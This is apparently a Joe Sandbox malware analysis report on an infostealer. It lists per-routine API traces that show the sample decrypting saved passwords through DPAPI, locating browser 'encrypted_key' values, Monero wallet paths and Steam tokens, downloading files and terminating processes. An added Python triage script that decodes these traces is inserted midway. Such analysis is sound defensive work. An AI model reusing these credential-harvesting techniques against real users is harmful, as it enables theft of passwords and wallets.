                            • Part of subcall function 00627750: RtlAllocateHeap.NTDLL(00000000), ref: 00627765
                            • Part of subcall function 00627750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0062778D
                            • Part of subcall function 00627750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 006277AD
                            • Part of subcall function 00627750: LocalFree.KERNEL32(?), ref: 006277B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006278EC
                          • HeapFree.KERNEL32(00000000), ref: 006278F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00627A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                           • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: 23a52176e0cba7b60c2b9654afef30271beea544f3ef845ebf29296a94e6f299
                          • Instruction ID: cc2ecca81c3ff2522d19cb1afd591463386f9541d6b2d834c7488e94f98accb1
                          • Opcode Fuzzy Hash: 23a52176e0cba7b60c2b9654afef30271beea544f3ef845ebf29296a94e6f299
                          • Instruction Fuzzy Hash: 19710DB1D00219EFDB50DFA5DC80EDEB7B9EF58300F104569E509A7240EA359A89CF94
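Added example (Python; not code from the Joe Sandbox report or from the Stealc sample): a small triage script that parses API lines in the format of the entries above, decodes the Win32 constants the report prints as raw hex words, and tags each routine with the behaviour its call set implies. The constructed input is copied from lines of this report: the WinINet download written to disk through CreateFileA/WriteFile (ref 00626B88), OpenProcess with mask 00001001 followed by TerminateProcess (ref 006445CA), the HKEY_CURRENT_USER key whose values are searched for "Password" and passed to CryptUnprotectData (refs 006278B8 and 0062778D), and the SOFTWARE\monero-project\monero-core / wallet_path query in the entry that follows. The behaviour tag names and the matching rules are this example's own choices, not Joe Sandbox fields.

```python
# Added triage helper (not from the report or the analysed sample): parse Joe
# Sandbox "APIs" lines, decode well-known Win32 constants, tag each routine.
import re
from collections import namedtuple

# Constructed sample: lines copied from this report, one routine per paragraph.
SAMPLE_REPORT = """\
InternetOpenA.WININET(0064CFEC,00000001,00000000,00000000,00000000), ref: 00626B2C
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00626B6A
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00626B88
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00626BA1
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00626BC6

wsprintfW.USER32 ref: 0064455B
OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 006445CA
TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 006445D9

RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00627805
StrStrA.SHLWAPI(?,Password), ref: 006278B8
Part of subcall function 00627750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0062778D

RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\\monero-project\\monero-core,00000000,00020119,?), ref: 00621159
RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00621173
"""
LINE_RE = re.compile(r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-F]+:\s*)?"
                     r"(?P<api>[\w:]+)\.[A-Z0-9]+(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
Call = namedtuple("Call", "api args ref")   # args: int (hex word), None ('?') or str literal

# Bitmask tables; composite names such as KEY_READ must precede their member bits.
FLAGS = {
    ("RegOpenKeyExA", 3): [(0x20019, "KEY_READ"), (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")],
    ("OpenProcess", 0): [(0x1, "PROCESS_TERMINATE"), (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"), (0x400, "PROCESS_QUERY_INFORMATION")],
    ("CreateFileA", 1): [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE")],
    ("CreateFileA", 2): [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE")],
    ("CreateFileA", 5): [(0x80, "FILE_ATTRIBUTE_NORMAL")],
    ("CryptUnprotectData", 5): [(0x1, "CRYPTPROTECT_UI_FORBIDDEN")],
}
ENUMS = {  # exact-value tables
    ("RegOpenKeyExA", 0): {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"},
    ("CreateFileA", 4): {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"},
    ("InternetOpenA", 1): {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT"},
}

def parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None                           # value the sandbox could not recover
    if re.fullmatch(r"-?[0-9A-F]{8}", tok):   # 32-bit word; a "-" prefix is a negative hex value
        return int(tok, 16) & 0xFFFFFFFF
    return tok                                # string literal (key path, value name, ...)

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
    return Call(m["api"], args, int(m["ref"], 16))

def decode_flags(value, table):
    names, rest = [], value
    for mask, name in table:
        if (rest & mask) == mask:
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(f"0x{rest:X}")           # bits the table has no name for
    return "|".join(names) or "0"

def decode_args(call):
    out = {}
    for i, v in enumerate(call.args):
        if isinstance(v, int) and (call.api, i) in FLAGS:
            out[i] = decode_flags(v, FLAGS[(call.api, i)])
        elif isinstance(v, int) and (call.api, i) in ENUMS:
            out[i] = ENUMS[(call.api, i)].get(v, f"0x{v:X}")
    return out

def tag_routine(calls):
    apis = {c.api for c in calls}
    literals = {a for c in calls for a in c.args if isinstance(a, str)}
    tags = set()
    if {"InternetOpenUrlA", "InternetReadFile", "WriteFile"} <= apis:
        tags.add("download_to_disk")
    if "TerminateProcess" in apis and any(c.api == "OpenProcess" and isinstance(c.args[0], int) and c.args[0] & 1 for c in calls):
        tags.add("kill_process_by_pid")       # OpenProcess asked for PROCESS_TERMINATE
    if "CryptUnprotectData" in apis and ("RegEnumValueA" in apis or "Password" in literals):
        tags.add("dpapi_credential_decrypt")
    if any(c.api.startswith("RegQueryValue") and any("wallet" in a.lower() for a in c.args if isinstance(a, str)) for c in calls):
        tags.add("crypto_wallet_path_lookup")
    return sorted(tags)

def triage(report_text):
    """One summary per blank-line-separated routine: first ref, API names, decoded args, tags."""
    results = []
    for block in re.split(r"\n\s*\n", report_text.strip()):
        calls = [c for c in map(parse_line, block.splitlines()) if c]
        if calls:
            results.append({"ref": f"{calls[0].ref:08X}", "apis": [c.api for c in calls],
                            "decoded": {f"{c.api}@{c.ref:08X}": d for c in calls if (d := decode_args(c))},
                            "tags": tag_routine(calls)})
    return results
```

The decode tables only name constants that actually occur in these entries; any bit the table does not know is left as hex rather than guessed, and the InternetOpenUrlA flags word (-00800100, a negative 32-bit value as printed) is parsed but deliberately not decoded. Running `triage(SAMPLE_REPORT)` yields one record per routine; the mask 00001001 at 006445CA comes back as PROCESS_TERMINATE|PROCESS_QUERY_LIMITED_INFORMATION, and 00020119 at 00621159 as KEY_READ|KEY_WOW64_64KEY, which is the 32-bit binary asking for the 64-bit registry view.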
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00621135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0062113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00621159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00621173
                          • RegCloseKey.ADVAPI32(?), ref: 0062117D
                          Strings
                          • wallet_path, xrefs: 0062116D
                          • SOFTWARE\monero-project\monero-core, xrefs: 0062114F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: 041db95ec0132fd1059761bea882e77521a6f9528c7d01dab21bf45b0e5548c5
                          • Instruction ID: 7cb07b298ddaa90d3c0d20ff459f37f2d6e21c4adefe348cde6f1b3e4b81050c
                          • Opcode Fuzzy Hash: 041db95ec0132fd1059761bea882e77521a6f9528c7d01dab21bf45b0e5548c5
                          • Instruction Fuzzy Hash: A3F03075640318FBD7109BE4AC4DFEA7B7CEB08717F100155FE05E6280EAB45A488BA0
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 00629E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 00629E42
                          • LocalAlloc.KERNEL32(00000040), ref: 00629EA7
                            • Part of subcall function 006471E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006471FE
                          • lstrcpy.KERNEL32(00000000,00654C48), ref: 00629FB2
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: 6ae39c7d889d03805908a794d7b63af2fcc92c617ec228d8c45894be3451a196
                          • Instruction ID: d2d5257362a77d4cec46c8d0bc80dc917a800c12817540bf35c87de6cb1d4a24
                          • Opcode Fuzzy Hash: 6ae39c7d889d03805908a794d7b63af2fcc92c617ec228d8c45894be3451a196
                          • Instruction Fuzzy Hash: 51511F71A1062AABCB50EF65EC42BDE77B6AF80315F150068FC49EB241CB70ED448FA0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0062565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00625661
                          • InternetOpenA.WININET(0064CFEC,00000000,00000000,00000000,00000000), ref: 00625677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00625692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 006256BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 006256E1
                          • InternetCloseHandle.WININET(?), ref: 006256FA
                          • InternetCloseHandle.WININET(00000000), ref: 00625701
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 3ac297f4cb14ab3a0ff1d45b46b6c883a4f5e4b18b20c6bc025de8a711255d8f
                          • Instruction ID: 15f2253360e592b605b1566f9c0cd8863320b39125b8f7dc01a615bed8f9835b
                          • Opcode Fuzzy Hash: 3ac297f4cb14ab3a0ff1d45b46b6c883a4f5e4b18b20c6bc025de8a711255d8f
                          • Instruction Fuzzy Hash: 10418F70A40B15EFDB24CF54EC88BAAB7B5FF48305F1480A9E9099B3A0E7759941CF94
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00644759
                          • Process32First.KERNEL32(00000000,00000128), ref: 00644769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0064477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0064479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 006447AB
                          • CloseHandle.KERNEL32(00000000), ref: 006447B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 006447C0
                          • CloseHandle.KERNEL32(00000000), ref: 006447CB
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: f7e07d877b2395ce82a22957aeded66d1e5eb95b20427175f95649b6d6e8a06a
                          • Instruction ID: 87d7d0dc081af09da16a041c33060f350635b37e0a6c96f5dafa621b53dd4f1f
                          • Opcode Fuzzy Hash: f7e07d877b2395ce82a22957aeded66d1e5eb95b20427175f95649b6d6e8a06a
                          • Instruction Fuzzy Hash: CB01B171601714EBE7205B609C8AFEA77BDFB08753F000581F949E12D0EF789D818AA0
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00638435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063846C
                          • lstrlen.KERNEL32(00000000), ref: 006384B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 006384E9
                          • lstrlen.KERNEL32(00000000), ref: 006384FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063852E
                          • StrCmpCA.SHLWAPI(00000000,00654C3C), ref: 0063853E
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 9e9e963f4b9e1bce4d67d3013ee131e6486291d156fc44a78001de08e7fc3e6f
                          • Instruction ID: fd4578edc457c8cb08251256207f7012f2982c1ea75def1bf59206fbf4899937
                          • Opcode Fuzzy Hash: 9e9e963f4b9e1bce4d67d3013ee131e6486291d156fc44a78001de08e7fc3e6f
                          • Instruction Fuzzy Hash: 29517A719006129FCB60DF68D894ADAB7FAEF48310F249459FC86DB345EF34E9418B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00642925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0064292C
                          • RegOpenKeyExA.ADVAPI32(80000002,0128B700,00000000,00020119,006428A9), ref: 0064294B
                          • RegQueryValueExA.ADVAPI32(006428A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00642965
                          • RegCloseKey.ADVAPI32(006428A9), ref: 0064296F
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: f1c4a59dea1e879b7acbf85bec54c394c9769de2e8d6e6a9cab8a1bcb23fd2ac
                          • Instruction ID: 6da8f0e1624b54e13e94b22503849a5752f72d73161d1f3451cf331e804a8330
                          • Opcode Fuzzy Hash: f1c4a59dea1e879b7acbf85bec54c394c9769de2e8d6e6a9cab8a1bcb23fd2ac
                          • Instruction Fuzzy Hash: D601B175600315EBD310CBA09C59EEB7BBDFB48716F200099FE85A7280EA35590487A0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00642895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0064289C
                            • Part of subcall function 00642910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00642925
                            • Part of subcall function 00642910: RtlAllocateHeap.NTDLL(00000000), ref: 0064292C
                            • Part of subcall function 00642910: RegOpenKeyExA.ADVAPI32(80000002,0128B700,00000000,00020119,006428A9), ref: 0064294B
                            • Part of subcall function 00642910: RegQueryValueExA.ADVAPI32(006428A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00642965
                            • Part of subcall function 00642910: RegCloseKey.ADVAPI32(006428A9), ref: 0064296F
                          • RegOpenKeyExA.ADVAPI32(80000002,0128B700,00000000,00020119,00639500), ref: 006428D1
                          • RegQueryValueExA.ADVAPI32(00639500,0129E008,00000000,00000000,00000000,000000FF), ref: 006428EC
                          • RegCloseKey.ADVAPI32(00639500), ref: 006428F6
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 9671f705132a2e33f6cd96720dff164504234b778ec1f16776cee696e87b5238
                          • Instruction ID: 1c91e9630f098760fbed8249b2e45c1e17468ebec8b03a50f169cf58943ded18
                          • Opcode Fuzzy Hash: 9671f705132a2e33f6cd96720dff164504234b778ec1f16776cee696e87b5238
                          • Instruction Fuzzy Hash: 1101A271A00319FFD7109BA4AC4DEAE7B6EFB44317F100599FE08E2290DA7859448BA0
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 0062723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00627279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00627280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 006272C3
                          • HeapFree.KERNEL32(00000000), ref: 006272CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00627329
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: 4c035dd60f60d9b07451dde1bfc085fa5536bd8da412fc54f3536ddd6cf8c87e
                          • Instruction ID: f420a2e558b254bb5175c799e7b0a120b319d65ec5e67c52dc841c439c5c341e
                          • Opcode Fuzzy Hash: 4c035dd60f60d9b07451dde1bfc085fa5536bd8da412fc54f3536ddd6cf8c87e
                          • Instruction Fuzzy Hash: A6413C71705B16DBDB20CF69EC84BAAB3E9FB88315F144569EC49C7350E635E9009B50
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 00629CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00629CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00629D03
                          Strings
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: a02b5404cc9f5ec33b6af621f8a2318548fe45cff370bdd430c08f4c6b4f6095
                          • Instruction ID: dc16effb4c7730068131de418c94800a4a009af07149a39b0421c294d3bdb12b
                          • Opcode Fuzzy Hash: a02b5404cc9f5ec33b6af621f8a2318548fe45cff370bdd430c08f4c6b4f6095
                          • Instruction Fuzzy Hash: A841D571A00A2A9BCB20EF65FC426EE77B6BF90344F045568EC1597352DA30ED05CFA0
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063EA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063EA53
                          • lstrcat.KERNEL32(?,00000000), ref: 0063EA61
                          • lstrcat.KERNEL32(?,00651794), ref: 0063EA7A
                          • lstrcat.KERNEL32(?,01298BB0), ref: 0063EA8D
                          • lstrcat.KERNEL32(?,00651794), ref: 0063EA9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 295e68b97b736eac046990b8a6ee6dd1d1860146d84c336784b92e9340983db9
                          • Instruction ID: b21286fc6b206848017cf0ad5a3b464be616c6cf7b76f147516ab452c2d78f47
                          • Opcode Fuzzy Hash: 295e68b97b736eac046990b8a6ee6dd1d1860146d84c336784b92e9340983db9
                          • Instruction Fuzzy Hash: 2041AB71910619EBC795EB64EC52FED7376FF48301F004598FA1697280DE749E848F94
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0063ECDF
                          • lstrlen.KERNEL32(00000000), ref: 0063ECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0063ED1D
                          • lstrlen.KERNEL32(00000000), ref: 0063ED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0063ED52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: a2fa480c52fed7a0622b0cc3ef6df4561a17f2462ef3346a18d27780a3fa410a
                          • Instruction ID: 75c58f47634aa848f86545058ebc26b3226d6dab41db38123bf438dd84deab4a
                          • Opcode Fuzzy Hash: a2fa480c52fed7a0622b0cc3ef6df4561a17f2462ef3346a18d27780a3fa410a
                          • Instruction Fuzzy Hash: 3531F571A109266BC761BB39FC1B99E77A7AF40301F041128F846DBB52DF24DC068BD8
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0062140E), ref: 00629A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0062140E), ref: 00629AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,0062140E), ref: 00629AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,0062140E,00000000,?,?,?,0062140E), ref: 00629AE0
                          • LocalFree.KERNEL32(?,?,?,?,0062140E), ref: 00629B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,0062140E), ref: 00629B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: d4fee298843e57f01fa3194cb9889c29df931d3c4cf17808a4621938624742e2
                          • Instruction ID: 8570939b5f9b9a8ed31ac3fe6f066dbefeb6631913918b6d28905e5b8df86a1c
